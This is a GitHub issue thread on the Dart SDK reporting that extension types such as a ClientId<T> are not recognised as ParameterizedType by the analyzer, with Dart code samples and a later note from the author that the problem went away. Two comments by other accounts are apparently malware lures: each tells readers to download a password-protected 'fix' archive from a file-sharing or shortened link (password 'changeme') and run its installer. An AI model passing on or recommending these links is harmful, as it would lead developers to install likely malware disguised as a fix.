### ISSUE TITLE
Extension types don't report as ParameterizedTypes

### ISSUE THREAD

**Issue by btrautmann** [dart-lang/sdk#56580]
#### General info

- Dart 3.5.0 (stable) (Tue Jul 30 02:17:59 2024 -0700) on "macos_arm64"
- on macos / Version 14.6.1 (Build 23G93)
- locale is en-US

#### Project info

- sdk constraint: '>=3.5.0 <4.0.0'
- dependencies: analyzer, build, build_runner, built_collection, built_value, code_builder, collection, dart_style, equatable, faker, glob, graphql, path, source_gen, yaml
- dev_dependencies: build_resolvers, built_value_generator, convert, crypto, ferry_generator, source_gen_test, test
- elided dependencies: 2

#### Process info

|  Memory |  CPU | Elapsed time | Command line                                                                               |
| ------: | ---: | -----------: | ------------------------------------------------------------------------------------------ |
|   23 MB | 0.0% |  05-20:38:05 | dart devtools --machine --allow-embedding --dtd-uri ws:<path>/KoKJ4DI27JDszLJw --port 9100 |
|  511 MB | 0.0% |        35:07 | dart language-server --protocol=lsp --client-id=VS-Code --client-version=3.94.0            |
| 5803 MB | 0.0% |  05-20:38:05 | dart language-server --protocol=lsp --client-id=VS-Code --client-version=3.94.0            |
|   42 MB | 0.0% |        35:07 | dart tooling-daemon --machine                                                              |
|   22 MB | 0.0% |  05-20:38:05 | dart tooling-daemon --machine                                                              |
|   40 MB | 0.0% |  05-20:38:05 | flutter_tools.snapshot daemon                                                              |

## The Issue

I am building a "meta code generator" that creates fake factories for objects generated by [`Ferry`](https://pub.dev/packages/ferry) which utilizes [`BuiltValue`](https://pub.dev/packages/built_value).

Here's an example factory my code generates:

```dart
abstract class GPrimitivesDataCharacterFactory {
  static _i1.GPrimitivesData_character build({
    _i2.ClientId? id,
    String? name,
  }) {
    return _i1.GPrimitivesData_character((b) => b
      ..id = id ?? _i3.ClientIdFactory.build()
      ..name = name ?? _$faker.person.name());
  }
}
```

_For context, the field that BuiltValue generated and that I need to provide a factory for is:_

```dart
final _i2.ClientId<Object> id;
```

Specifically note the `_i2.ClientId? id` parameter and the setter `..id = id ?? _i3.ClientIdFactory.build()`. I am running into an issue depending on the definition of `ClientId`.

If defined as an `extension type`, such as:

```dart
extension type ClientId<T>(int value) implements Object {
  factory ClientId.fromJson(int json) => ClientId(json);

  int toJson() => value;
}
```

checking `field.type is ParameterizedType` returns `false`.

However, if I instead define `ClientId` as a proper class:

```dart
class ClientId<T> {
  const ClientId(this.value);

  final int value;

  factory ClientId.fromJson(int json) => ClientId(json);

  int toJson() => value;
}
```

The same check (BuiltValue produces the same generated field) returns `true`.

I imagine this is because extension types are new, but I did not see another issue stating the same so figured I'd open one.

In the meantime, I'm hunting for a hacky way to work around this, if you know of one!

Thank you 🙏

**Comment by btrautmann** [comment]
Interestingly, `field.type is ExtensionType` also returns `false`.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by btrautmann** [comment]
Not sure what happened, but I spent hours looking at this, filed the issue, and then suddenly thing began working as I expected. So I'm closing this for now but will re-open if I run into it again.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
